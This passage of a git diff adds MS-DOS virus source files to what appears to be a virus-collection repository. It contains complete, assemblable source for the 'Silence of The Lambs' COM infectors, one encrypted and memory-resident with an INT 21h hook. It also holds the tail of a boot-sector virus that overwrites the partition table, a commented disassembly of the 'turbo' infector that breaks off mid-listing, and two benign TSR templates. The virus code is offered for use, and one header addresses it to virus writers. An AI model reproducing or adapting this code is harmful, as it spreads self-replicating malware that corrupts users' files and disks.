cx,0042h + cld + rep movsb ; Kopiera part. data till viruset. + + mov ax,0301h + sub bx,bx + mov cx,0001h + mov dx,0080h + int 13h ; Skriv viruset till part. tabellen. + + + sub ax,ax + mov es,ax ; Kolla om msg:et ska skrivas ut. + test Byte Ptr es:[046Ch],07h + jnz HdInf1 + + mov si,Offset Txt ; Detta utfrs bara om man bootar frn + cld ; diskett. +Foo1: lodsb + cmp al,00h + je HdInf1 + mov ah,0Eh + sub bx,bx + int 10h + jmp Foo1 + +HdInf1: jmp Over + + +Slutet Label Byte ; Anvnds fr att veta var slutet r. + + +Txt db 07h,0Ah,0Dh,'The Swedish Disaster I',0Ah,0Dh,00h + + +Main Endp +Code Ends + End + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm b/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm new file mode 100644 index 00000000..286edf11 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsotl-a.asm @@ -0,0 +1,166 @@ +; Silence of The Lambs v1.0 +; (c) The Chronomancer of Demoralized Youth 1992 +; +; First version : Thursday 27th of Febuary - 01:50 CET. +; + +org 100h +jmp short dummy1 +db 'DY' +dummy1: + mov cx,(100h-80h)/2 ;save command line on stack + mov si,80h + save_parm: + push [si] + inc si + inc si + loop save_parm + + mov ah,4Eh + xor cx,cx + mov dx,offset file + int 21h + jc nomore +again: + cmp byte [9Eh],0FAh + jae more + call infect +more: + mov ah,4Fh + int 21h + jnc again +nomore: + mov cx,(100h-80h)/2 + mov si,0FEh +rest_parm: + pop [si] + dec si + dec si + loop rest_parm + + mov bx,0000h +eof equ $-2 + jmp bx + +file db '*.COM',0 + +infect: + mov bx,cs + mov si,cs + dec si + mov ds,si + cmp byte[0],'Z' + je ok_mark + jmp back2 +ok_mark: + sub word [0003h],pgfsize + jnc ok_mark2 + jmp back +ok_mark2: + mov ax,[0012h] + sub ax,pgfsize + push ax + + mov ds,bx + mov ax,4301h + xor cx,cx + mov dx,80h+1Eh + int 21h + + mov ax,3D02h + int 21h + xchg bx,ax + + pop ds + push ds + mov cx,total + xor dx,dx + mov ah,3Fh + int 21h + + cmp byte [0],'M' ;exe ? + je close + cmp byte [0],'Z' ;exe ? + je close + cmp word [2],'YD' ;allready infected? + je close + + xor cx,cx + xor dx,dx + push cx + push dx + mov ax,4202h + int 21h + + add ax,total+100h + mov cs:word [00FEh],ax + + mov ah,40h + mov cx,total + xor dx,dx + int 21h + + push cs + pop ds + + mov ah,40h + mov cx,applen + mov dx,offset append + int 21h + + mov ax,4200h + pop dx + pop cx + int 21h + + push [eof] + mov ax,word [00FEh] + mov [eof],ax + + mov ah,40h + mov dx,100h + mov cx,total + int 21h + + pop [eof] +close: + mov ah,3Eh + int 21h +back: + pop ds ;(mov ds,si) + add word [0003h],pgfsize +back2: + push cs + pop ds + ret + +append: +call $+3 +pop si +sub si,3+total +mov di,100h +mov cx,total +rep movsb +mov ax,100h +push ax +ret +applen equ $-offset append + +total equ $-100h ;size +pgfsize equ ($-100h)/16+2 ;paragraphs needed + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm b/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm new file mode 100644 index 00000000..6204adfc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm @@ -0,0 +1,322 @@ +; Silence of The Lambs v2.0 +; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992 +; +; THIS FILE IS FOR EDUCATION PURPOSES ONLY! +; PERMISSION IS GRANTED TO SPREAD THE SOURCE +; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE +; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE +; THE ORIGINAL SOURCE. +; +; Assemble With A86 +; + +org 100h +jmp short dummy1 +db 'DY' +dummy1: + mov cx,length + mov si,offset enc_start + mov ah,0 +enc_key equ $-1 +dummy2: + sub byte [si],ah + inc si + add ah,0 +enc_add equ $-1 + loop dummy2 +enc_start: + mov ah,2Dh + mov ch,0FFh + mov dx,cx + int 21h + cmp al,0FFh + jne nomore + + mov ax,cs + dec ax + mov ds,ax + cmp byte [0],'Z' + jne nomore + + mov ax,word [3] + sub ax,pgfsize + jc nomore + sub word [3],pgfsize + sub word [12h],pgfsize + + mov es,word [12h] + mov si,110h + mov di,100h + mov cx,total + cld + rep movsb + + xor ax,ax + mov ds,ax + mov si,84h + mov di,old21 + movsw + movsw + + cli + mov word [84h+2],es + mov word [84h],offset ni21 + sti + +nomore: + push cs + push cs + pop es + pop ds + + mov bx,0000h ;return control to the +eof equ $-2 ;end user + jmp bx + +xclose: jmp close + +infect: + push cs + pop ds + push cs + pop es + + db 0E4h,40h + mov byte [enc_key],al + + mov ax,4300h ;use CHMOD to get file attr + xor dx,dx + int 21h + + mov [0F0h],cx ;store attr in PSP + + mov ax,4301h ;clear file attr with CHMOD + xor cx,cx + int 21h + + mov ax,3D02h ;open file for read / write + int 21h + xchg bx,ax + lahf + push ax + mov ax,5700h ;get file date & time + int 21h + + mov [0F2h],cx + mov [0F4h],dx + pop ax + sahf + jc xclose + + mov ah,3Fh ;read from file + mov cx,total + mov dx,old + int 21h + + cmp byte [old+0],'M' ;exe MZ ? + je xclose + cmp byte [old+0],'Z' ;exe ZM ? + je xclose + cmp word [old+2],'YD' ;allready infected? + je xclose + + mov ax,4202h ;lseek to EOF + xor cx,cx + xor dx,dx + int 21h + + cmp ah,0FAh + jae xclose + cmp ah,4 + jb xclose + + add ax,total+100h + mov word [00F6h],ax + + mov ah,40h ;write to EOF + mov cx,total + mov dx,old + +push cx +mov al,byte [enc_key] +mov si,dx +enc_app: +xor byte [si],al +inc si +loop enc_app +pop cx + + int 21h + + mov ah,40h ;write to EOF + mov cx,applen + mov dx,offset append + int 21h + + mov ax,4200h ;lseek to beginning of file + xor cx,cx + xor dx,dx + int 21h + + push [eof] + mov ax,word [00F6h] + mov [eof],ax + + mov ah,byte [enc_key] + db 0E4h,40h + mov byte [enc_add],al + mov dl,al + + mov si,100h + mov di,old + + cld + mov cx,offset enc_start-100h + rep movsb + + mov cx,length +enc: + lodsb + add al,ah + stosb + add ah,dl + loop enc + + mov ah,40h ;write viral code + mov dx,old + mov cx,total + int 21h + + pop [eof] +close: + mov ax,5701h + mov cx,[00F2h] + mov dx,[00F4h] + int 21h + + mov ah,3Eh ;close file + int 21h + + mov ax,4301h + mov cx,[00F0h] + xor dx,dx + int 21h + ret + +append: + call $+3 ;replace org bytes + pop si + sub si,3+total + mov di,100h + mov cx,total + mov ah,byte [enc_key] +append_enc: + lodsb + xor al,ah + stosb + loop append_enc + + mov ax,100h ;return IP to 100h when done + push ax + + sub ax,ax ;zero regs + xor bx,bx + and cx,cx + sub dx,dx + xor si,si + and di,di + sub bp,bp + + ret +applen equ $-offset append + +ni21: + pushf + cmp ah,2Dh + jne Not_Time + cmp ch,0FFh + jne Not_Time + cmp ch,dh + jne Not_time + + mov Al,0 + popf + iret +Not_Time: + cld + push ax + push bx + push cx + push dx + push si + push di + push bp + push es + push ds + +; cmp ah,41h +; jne Not_Parse +; mov ah,3Ch +; cli +; add sp,18 +; sti +; popf +; jmp old21-1 + +Not_Parse: + cmp ax,4B00h + jne Not_Exec + + mov si,dx + push cs + pop es + xor di,di + mov cx,128 + rep movsb + + mov ax,3524h + int 21h + push es + push bx + + push cs + pop ds + + mov ax,2524h + mov dx,offset ni24 + int 21h + + call infect + + pop dx + pop ds + mov ax,2524h + int 21h + +Not_Exec: + pop ds + pop es + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf + jmp far 0000:0000 +old21 equ $-4 + +ni24: mov al,0 + iret + +db 'The Silence Of The Lambs!$' + +total equ $-100h ;size +pgfsize equ (($*2)/16)+2 +length equ $-offset enc_start + +old equ $ + + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsr.asm b/MSDOS/Virus.MSDOS.Unknown.tsr.asm new file mode 100644 index 00000000..5c4cd1e8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsr.asm @@ -0,0 +1,307 @@ + +; NOTE : This template is for .COM files only do not use for .EXE files!! + + +; +; +; +; Copyright 1986 by Dana Nowell - All rights reserved +; +; HISTORY: +; Version Date Name Description +; 1.0 11/10/86 dn first cut +; 1.01 11/21/86 dn Fixed memory allocation bug +; Added installation message +; + + +title TSR Template + + + + NULL equ 00h + BELL equ 07h ; bell character + BACKSPACE equ 08h ; backspace character + TAB equ 09h ; tab character + LF equ 0ah ; line feed + F_FEED equ 0ch ; form feed + CR equ 0dh ; carriage return + EOF equ 1ah ; ctrl z ( end of file ) + SPACE equ ' ' ; ascii space character + QUOTE equ '"' + +SIGNATURE1 equ 6144h ; used for already +SIGNATURE2 equ 616eh ; resident check + +DOS_INT equ 21h ; DOS function interrupt +DISP_CHAR equ 02h +GET_KEY equ 08h +DOS_SCR_MSG equ 09h +DOS_SET_INT equ 25h +DOS_RESIDENT equ 31h +DOS_GET_INT equ 35h +DOS_TERMINATE equ 4ch +DOS_STRING_TERM equ '$' + +; Interrupt vectors used + +HOOK_INT equ 1ch ; interrupt to be hooked ( timer tick now ) + +;------------------------------------------------------------------------------ +; +; MACRO SECTION +; +;------------------------------------------------------------------------------ + +Version_msg macro + jmp short copyright_end + +copyright_msg db CR, LF + db 'TSR Shell - Version 1.01', CR, LF + db 'Copyright 1986, Dana Nowell ', CR, LF, CR, LF + db 'May be distributed without license', CR, LF, '$' +copyright_end: + Msg copyright_msg + endm + + +Msg macro ptr + + push dx + push ax + + lea dx, ptr + mov ah, 09h + int 21h + + pop ax + pop dx + + endm + + + + + +com segment para public 'code' + assume cs:com, ds:com, es:com + +;------------------------------------------------------------------------------ +; +; note: The PSP occurs at the beginning of the code segment +; for all programs. In COM files the code seg = data seg +; +;------------------------------------------------------------------------------ + + org 0 + +psp_start dw ? ; int 20h - possibly a block for unresolved + ; externals during link ? + +mem_size dw ? ; size of available memory in paragraphs +filler db ? ; reserved usually zero + +dos_call db ? ; call + dd ? ; address of dos function handler + +term_vector dd ? ; address of dos terminate routine +break_vector dd ? ; address of dos break routine +error_vector dd ? ; address of dos error routine +dos_reserved db 2 dup(?); reserved by dos +dos_handles db 20 dup(?) ; file handle array +environ_ptr dw ? ; seg of dos environment ( offset = 0 ) +dos_work db 34 dup(?) ; dos work area + +int_21h db ? ; int + db ? ; 21h + db ? ; retf ( return far ) + +reserved dw ? ; reserved by dos +fcb1_ext db 7 dup(?) ; fcb # 1 extension +fcb1 db 9 dup(?) ; fcb #1 +fcb2_ext db 7 dup(?) ; fcb # 2 extension +fcb2 db 20 dup(?) ; fcb #2 + +; +; disk transfer area ( dta ) and parameter block occupy the same space +; +; +;dta db 128 dup(?) ; disk transfer area + + + +param_len db ? ; length of parameter string ( excludes CR ) +parameters db 127 dup(?) ; parameters + +;------------------------------------------------------------------------------ +; +; Note on standard fcb structure : +; +; The standard FCB is larger than the size reserved in the PSP if you +; intend to use to FCB data from the PSP move it to a different location. +; +; +; STANDARD STRUCTURE OF A FILE CONTROL BLOCK +; +; +; extension : +; offset length description +; -7 1 extension active flag ( 0ffh = active ) +; -6 5 normally unused should be zeros +; -1 1 file attribute when extension is active +; 1 . . . . . . . 1 read-only +; 2 . . . . . . 1 . hidden +; 4 . . . . . 1 . . system +; 8 . . . . 1 . . . volume label +; 16 . . . 1 . . . . subdirectory +; 32 . . 1 . . . . . archive +; 64 . 1 . . . . . . unused +; 128 1 . . . . . . . unused +; +; fcb : +; offset length description +; 0 1 special drive number ( 1 byte ) +; 0 = default +; 1 = a: +; 2 = b: etc +; 1 8 filename or device name +; 9 3 filename extension +; 12 2 current block number +; 14 2 record size +; 16 4 file size in bytes ( dos dir entry at open ) +; 20 2 file date ( bit coded as in dir ) +; 22 10 dos work area +; 32 1 current record number ( 0 - 127 ) +; 33 4 random record number +; +;------------------------------------------------------------------------------ + + + + org 100h ; required for COM file ( skips PSP ) + + +start: + jmp install ; install the demon + +;------------------------------------------------------------------- +; +; resident data structures go here +; +;------------------------------------------------------------------- + + old_int dd 0 ; original value of hooked interrupt + resident1 dw SIGNATURE1 + resident2 dw SIGNATURE2 + + +;------------------------------------------------------------------- +; +; new interrupt starts here +; +;------------------------------------------------------------------- + +new_int: + pushf + + sti ; must turn INT on if we're going to use them + +;------------------------------------------------------------------- +; +; be well behaved and pass control to original int +; +;------------------------------------------------------------------- + + popf + pushf + call dword ptr cs:old_int ; do old interrupt + + iret ; bye bye + +;------------------------------------------------------------------------------ +; +; INSTALLATION DATA STRUCTURES AND CODE GO HERE +; +; WARNING WARNING WARNING - this area does not exist after installation +; +;------------------------------------------------------------------------------ + +last_resident_byte db 0 ; last resident byte +resident_flag dw 0 ; am I already resident ? ( 0 = NO ) + +install_msg db CR, LF, 'Installation Complete', CR, LF, '$' + +already_installed_msg db CR, LF + db 'Already Installed - Installation Aborted' + db CR, LF, '$' + +install proc near + + Version_msg + + + mov al, HOOK_INT ; int to hook + mov ah, DOS_GET_INT ; get int(AL) vector ==> ES+BX + int DOS_INT ; do the int + lea si, old_int ; where to put old timer interrupt vector + mov [si], bx ; save the offset and segment + mov 2[si], es ; ( es also used in check resident ) + + call check_resident ; am I already resident ? + + cmp resident_flag, 0 + je not_resident + + Msg already_installed_msg + + mov ah, DOS_TERMINATE ; terminate & stay resident + mov al, 1 ; return value is 1 (already installed) + int DOS_INT ; bye-bye + +not_resident: + mov dx, offset new_int ; offset of new timer interrupt + mov al, HOOK_INT ; timer tick + mov ah, DOS_SET_INT ; set int(AL) vector from DS+DX + int DOS_INT ; do the int + +; program terminate and stay resident + + Msg install_msg ; Display the installation message + + mov dx, offset last_resident_byte + + mov cl, 4 ; convert to paragraphs required to + shr dx, cl ; remain resident ( divide by 16 ) + inc dx ; allow for any remainder of division + + mov ah, DOS_RESIDENT ; terminate & stay resident + mov al, 0 ; return value is 0 (good return) + int DOS_INT ; bye-bye + +install endp + + +; +; Check resident procedure +; requires es register to contain the segment address of +; the current location for the interrupt being hooked. +; use the DOS function 35h to obtain this information. +; + +check_resident proc near + + cmp es:resident1, SIGNATURE1 + jne not_res + cmp es:resident2, SIGNATURE2 + jne not_res + + mov resident_flag, 1 + +not_res: + ret + +check_resident endp + +com ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.tsres.asm b/MSDOS/Virus.MSDOS.Unknown.tsres.asm new file mode 100644 index 00000000..6a7125f2 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.tsres.asm @@ -0,0 +1,296 @@ +;************************************************************* +;** Terminate-but-Stay-Resident ** +;** Original from the "Programmer's Journal" ** +;** Modified by Alroger L. Gomes Jr. ** +;** Any comments/question send message for "Roger Gomes" ** +;** on the PDSE BBS (408)735-7190. Have Fun! ** +;************************************************************* +; Insert you program on line # 157. + +Delay_Count Equ 36 ;36 ticks=approx. 2 seconds + +; Locations of BIOS Data needed by the resident program + +Bios_Data Segment at 40h + Org 17h + Kbd_Status dw ? + Org 6Ch + Low_Timer dw ? +Bios_Data EndS + + +Code Segment + Assume Cs:Code, Ds:Code, Es:Nothing, Ss:Nothing + Org 100h +Entry_Point: + Jmp Install + + Hot_Keys dw 01010B + This_Time dw ? + Trig_Time dw ? + Dos_Busy Label dword + Dos_Busy_Off dw ? + Dos_Busy_Seg dw ? + Criterr_Flag db ? + +Already8 db 0 +MenuON db 0 + + +;*** Replacement for Int 24h - critical Dos Error *** +Diverted_Int24: + Mov Cs:Criterr_Flag,1 + Xor Al,Al + Iret + + Int_24_Vect Label dword + Int_24_Off dw ? + Int_24_Seg dw ? + +;***** ID CODE ***** +Res_ID1 dw 'Al' +Res_ID2 dw 'ro' +Res_ID3 dw 'ge' +;******************* + +;*** Replacement for Int 8 - Timer hardware Interrupt *** +Diverted_Int8: + Pushf + Call_Int8 db 09Ah + Int_8_Vect Label dword + Int_8_Off dw ? + Int_8_Seg dw ? + + Cmp Cs:MenuOn,0 + Je MenuNOT + Iret +MenuNOT: + Mov Cs:MenuOn,1 + Push Ds + Push Bx + Lds Bx,Cs:Dos_Busy + Cmp Byte Ptr [Bx],0 + Pop Bx + Pop Ds + Mov Cs:MenuOn,0 + Jz Get_Bios_Data +Dos_is_Busy: + Iret + +;*** Replacement for Int 28 - Generated by Dos, esp. during keyboard I/O *** +Diverted_Int28: + Pushf + Call_Int28 db 09Ah + Int_28_Vec Label dword + Int_28_Off dw ? + Int_28_Seg dw ? + Cmp Cs:MenuOn,0 + Je Get_Bios_Data + Iret + +Get_Bios_Data: + Mov Cs:MenuOn,1 + Sti + Push Ds + Push Ax + Mov Ax,Bios_Data + Mov Ds,Ax + Assume Ds:Bios_Data + Mov Ax,Low_Timer + Mov Cs:This_time,Ax + Mov Ax,Kbd_Status + Push Cs + Pop Ds + Assume Ds:Code +Chk_Keys: + And Ax,Hot_Keys + Cmp Ax,Hot_Keys + Jne Back_to_Applic +Chk_Timer: + Mov Ax,This_Time + Cmp Ax,Trig_Time + Jb Time_is_Right + Sub Ax,Trig_Time + Sub Ax,Delay_Count + Jnc Time_is_Right + +Back_to_Applic: + Pop Ax + Pop Ds + Mov Cs:MenuOn,0 + Iret + +Time_is_Right: + Mov Ax,This_Time + Mov Trig_Time,Ax + Pop Ax + Pop Ds + +;*************************************************************************** +; This is the Start of the application-dependent resident code + +Start_Program: + Mov Cs:MenuOn,1 + Push Ax + Push Bx + Push Cx + Push Dx + Push Si + Push Di + Push Bp + Push Ds + Push Es + + Push Cs + Pop Ds + + Mov Ax,3524h + Int 21h + Mov Int_24_Off,Bx + Mov Int_24_Seg,Es + Mov Ax,2524h + Mov Dx,Offset Diverted_Int24 + Int 21h + +;**************************************************************************** + +; Insert your program here. + +;**************************************************************************** + +Restore_Int24: + Lds Dx,Int_24_Vect + Mov Ax,2524h + Int 21h + Pop Es + Pop Ds + Pop Bp + Pop Di + Pop Si + Pop Dx + Pop Cx + Pop Bx + Pop Ax + Mov Cs:MenuOn,0 + Mov Cs:Already8,0 + Iret + +; This is the end off the applicant-dependent resident code + + End_of_Res Label word + +;*************************************************************************** +; Installation + +Install: + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Mov Ah,9 + Mov Dx,OffSet CopyRight + Int 21h + +; Make sure that it is at least Dos 2.00 + Mov Ah,30h + Int 21h + Or Al,Al + Jnz Chk_Vectors + Mov Dx,Offset BadDos_Msg + Mov Ah,9 + Int 21h + Int 20h + +; See if resident code is already Installed in Memory + +Chk_Vectors: + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Mov Ax,3508h + Int 21h + Cmp Word Ptr [Es:Bx-6],'Al' + Jne Not_Installed1 + Cmp Word Ptr [Es:Bx-4],'ro' + Jne Not_Installed1 + Cmp Word Ptr [Es:Bx-2],'ge' + Jne Not_Installed1 + + Mov Dx,Offset No_Install_Msg + Mov Ah,9 + Int 21h + Mov Ax,4C01h + Int 21h + +Not_Installed1: + Mov Ax,3577h + Int 21h + Mov Ax,Es + Cmp Ax,'Al' + Jne Not_Installed + Cmp Bx,'ro' + Jne Not_Installed + + Mov Dx,Offset No_Install_Msg + Mov Ah,9 + Int 21h + Mov Ax,4C01h + Int 21h + +Not_Installed: + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Push Es + Mov Ax,Cs + Mov Ds,Ax + Mov Es,Ax + + Mov Ah,34h + Int 21h + Mov Dos_Busy_Off,Bx + Mov Dos_Busy_Seg,Es + + Mov Ax,3508h + Int 21h + Mov Int_8_Off,Bx + Mov Int_8_Seg,Es + + Mov Ax,Cs + Mov Es,Ax + Mov Ds,Ax + + Mov Ax,2508h + Mov Dx,Offset Diverted_Int8 + Int 21h + + Mov Ax,'Al' + Mov Ds,Ax + Mov Dx,'ro' + Mov Ax,2577h + Int 21h + Mov Ax,Cs + Mov Ds,Ax + + Mov Ax,3528h + Int 21h + Mov Int_28_Off,Bx + Mov Int_28_Seg,Es + Mov Ax,2528h + Mov Dx,Offset Diverted_Int28 + Int 21h + Pop Es + +; Terminate and stay resident + Mov Dx,Offset Install + Int 27h + +No_Install_Msg db 'xxxx is already in memory!',10,13,10,13,'$' +BadDos_Msg db 'DOS 2.0 or greater needed!',10,13,10,13,'$' +CopyRight db 'xxxx by ?????? - yyyy $' + +Code EndS + End Entry_Point + diff --git a/MSDOS/Virus.MSDOS.Unknown.turbo.asm b/MSDOS/Virus.MSDOS.Unknown.turbo.asm new file mode 100644 index 00000000..906cad16 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.turbo.asm @@ -0,0 +1,324 @@ + @ virus unassembled list: + `90.07.21. + +Magyarzat: Kvri Lszl + Tel.: (41) 21-822 07-13:20 mh. + 21-033 18:00- + + +0EB0:0100 E80000 CALL 0103 +0EB0:0103 90 NOP +0EB0:0104 5E POP SI ;SI=IP bziscm +0EB0:0105 50 PUSH AX +0EB0:0106 51 PUSH CX +0EB0:0107 B82135 MOV AX,3521 +0EB0:010A CD21 INT 21 ;INT 21h cm lekrdezse +0EB0:010C 8CC0 MOV AX,ES +0EB0:010E 3D0040 CMP AX,4000 ;memriban vam ? +0EB0:0111 7220 JB 0133 ;nincs nem 4000h fl + ;mutat! +0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza +0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime +0EB0:0119 03F2 ADD SI,DX ;bzishoz +0EB0:011B 8B1C MOV BX,[SI] +0EB0:011D 8B4C02 MOV CX,[SI+02] +0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op. +0EB0:0124 890E0201 MOV [0102],CX ;visszaraksa +0EB0:0128 8CD8 MOV AX,DS +0EB0:012A 8EC0 MOV ES,AX ;ES=DS +0EB0:012C 59 POP CX +0EB0:012D 58 POP AX +0EB0:012E BB0001 MOV BX,0100 +0EB0:0131 FFE3 JMP BX ;ugrs 0100h-ra igy + ;lefut az eredeti prg. + ;Ha nincs a memriban +0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetejnek + ;paragrafuscme +0EB0:0136 2D0008 SUB AX,0800 +0EB0:0139 8EC0 MOV ES,AX ;virus j szegmens +0EB0:013B BF0001 MOV DI,0100 +0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza +0EB0:0141 B90002 MOV CX,0200 ;virus mrete +0EB0:0144 F3 REPZ +0EB0:0145 A4 MOVSB ;virus msolsa az + ;j szegmensbe +0EB0:0146 8C06F200 MOV [00F2],ES ;j szegmenscm +0EB0:014A B95501 MOV CX,0155 ;j szegmensben a be- + ;lpsi offset-je +0EB0:014D 890EF000 MOV [00F0],CX +0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugrs az j seg.:0155 + + ;belpsi pont +0EB0:0155 8CC1 MOV CX,ES +0EB0:0157 8CD8 MOV AX,DS +0EB0:0159 26 ES: +0EB0:015A A38C02 MOV [028C],AX ;rgi seg (eredeti + ;program) +0EB0:015D B80001 MOV AX,0100 +0EB0:0160 26 ES: +0EB0:0161 A38A02 MOV [028A],AX ;0100h offset +0EB0:0164 8CC0 MOV AX,ES +0EB0:0166 8ED8 MOV DS,AX ;DS=j seg +0EB0:0168 B82135 MOV AX,3521 +0EB0:016B CD21 INT 21 ;INT 21h lekrdezse +0EB0:016D 2E CS: +0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset +0EB0:0172 8CC3 MOV BX,ES +0EB0:0174 2E CS: +0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment +0EB0:0179 B8A501 MOV AX,01A5 ;j INT 21h offset +0EB0:017C 8BD0 MOV DX,AX +0EB0:017E 8BC1 MOV AX,CX +0EB0:0180 8ED8 MOV DS,AX +0EB0:0182 B82125 MOV AX,2521 +0EB0:0185 CD21 INT 21 ;INT 21h ellopsa +0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op. +0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus +0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg. +0EB0:0192 8ED8 MOV DS,AX +0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op. +0EB0:0198 890E0201 MOV [0102],CX ;visszaraksa +0EB0:019C 8EC0 MOV ES,AX +0EB0:019E 59 POP CX +0EB0:019F 58 POP AX +0EB0:01A0 2E CS: +0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugrs az eredeti + ;programra + + ;j INT 21h rutin +0EB0:01A5 90 NOP +0EB0:01A6 80FC3D CMP AH,3D ;file nyits ? +0EB0:01A9 7403 JZ 01AE ;igen +0EB0:01AB E9C000 JMP 026E ;ugrs az eredeti + ;INT 21h-ra +0EB0:01AE 1E PUSH DS +0EB0:01AF 06 PUSH ES +0EB0:01B0 50 PUSH AX +0EB0:01B1 53 PUSH BX +0EB0:01B2 51 PUSH CX +0EB0:01B3 52 PUSH DX +0EB0:01B4 57 PUSH DI +0EB0:01B5 56 PUSH SI + + ;Ellenrzi hogy COM file-e + +0EB0:01B6 8BFA MOV DI,DX ;Filespec. +0EB0:01B8 8CDE MOV SI,DS +0EB0:01BA 8EC6 MOV ES,SI +0EB0:01BC B000 MOV AL,00 +0EB0:01BE B93200 MOV CX,0032 +0EB0:01C1 FC CLD +0EB0:01C2 F2 REPNZ +0EB0:01C3 AE SCASB ;PATH lemsolsa +0EB0:01C4 83EF03 SUB DI,+03 +0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba +0EB0:01CA 26 ES: +0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ? +0EB0:01CD 7403 JZ 01D2 ;igen +0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra +0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be +0EB0:01D5 26 ES: +0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ? +0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file! +0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra +0EB0:01DE B43D MOV AH,3D ;file nyitsa +0EB0:01E0 B002 MOV AL,02 ;rs/olvass +0EB0:01E2 E89000 CALL 0275 ;INT 21h hivsa +0EB0:01E5 7303 JNB 01EA ;ha nincs hiba +0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra + + ;File mret ellenrzs + +0EB0:01E9 90 NOP +0EB0:01EA 8BD8 MOV BX,AX ;kezel +0EB0:01EC B90000 MOV CX,0000 +0EB0:01EF BA0000 MOV DX,0000 +0EB0:01F2 B80242 MOV AX,4202 ;file vgre poz. +0EB0:01F5 E87D00 CALL 0275 ;INT 21h hivsa +0EB0:01F8 3D00FE CMP AX,FE00 +0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra + + ;Eredeti 4 byte beolvassa (JMP+operandusa) + +0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza +0EB0:0200 2E CS: +0EB0:0201 A38102 MOV [0281],AX +0EB0:0204 B80042 MOV AX,4200 ;file elejre poz. +0EB0:0207 B90000 MOV CX,0000 +0EB0:020A BA0000 MOV DX,0000 +0EB0:020D E86500 CALL 0275 ;INT 21h hivsa +0EB0:0210 B43F MOV AH,3F ;olvass +0EB0:0212 B90400 MOV CX,0004 ;4 byte +0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa +0EB0:0218 8CCF MOV DI,CS +0EB0:021A 8EDF MOV DS,DI ;DS=CS +0EB0:021C E85600 CALL 0275 ;INT 21h hivsa +0EB0:021F B005 MOV AL,05 +0EB0:0221 3A068902 CMP AL,[0289] +0EB0:0225 743F JZ 0266 + + ;Virusra mutat JMP+op bersa a programba + +0EB0:0227 B80042 MOV AX,4200 ;file elejre poz. +0EB0:022A B90000 MOV CX,0000 +0EB0:022D 8BD1 MOV DX,CX +0EB0:022F E84300 CALL 0275 ;INT 21h hivsa +0EB0:0232 B0E9 MOV AL,E9 ;JMP kdja +0EB0:0234 2E CS: +0EB0:0235 A28002 MOV [0280],AL ;leteszi +0EB0:0238 B005 MOV AL,05 +0EB0:023A 2E CS: +0EB0:023B A28302 MOV [0283],AL +0EB0:023E B90400 MOV CX,0004 ;4 byte +0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete +0EB0:0244 0E PUSH CS +0EB0:0245 1F POP DS +0EB0:0246 B440 MOV AH,40 ;kirs +0EB0:0248 E82A00 CALL 0275 ;INT 21h hivsa + + ;1C0h byte kirsa FERTZS! + +0EB0:024B B80242 MOV AX,4202 ;file vgre poz. +0EB0:024E B90000 MOV CX,0000 +0EB0:0251 8BD1 MOV DX,CX +0EB0:0253 E81F00 CALL 0275 ;INT 21h hivsa +0EB0:0256 BA0001 MOV DX,0100 ;0100h -tl +0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte +0EB0:025C B440 MOV AH,40 ;kirsa +0EB0:025E E81400 CALL 0275 ;INT 21h hivsa + + ;Ffertztt file zrsa + +0EB0:0261 B43E MOV AH,3E +0EB0:0263 E80F00 CALL 0275 ;INT 21h hivsa +0EB0:0266 5E POP SI +0EB0:0267 5F POP DI +0EB0:0268 5A POP DX +0EB0:0269 59 POP CX +0EB0:026A 5B POP BX +0EB0:026B 58 POP AX +0EB0:026C 07 POP ES +0EB0:026D 1F POP DS +0EB0:026E 90 NOP +0EB0:026F 2E CS: +0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugrs az eredeti + ;INT 21h-ra +0EB0:0274 CF IRET + + ;Eredeti INT 21h hivsa +0EB0:0275 9C PUSHF ;IRET miatt! +0EB0:0276 2E CS: +0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hivsa +0EB0:027B C3 RET + +0EB0:027C 16 PUSH SS +0EB0:027D 130C ADC CX,[SI] 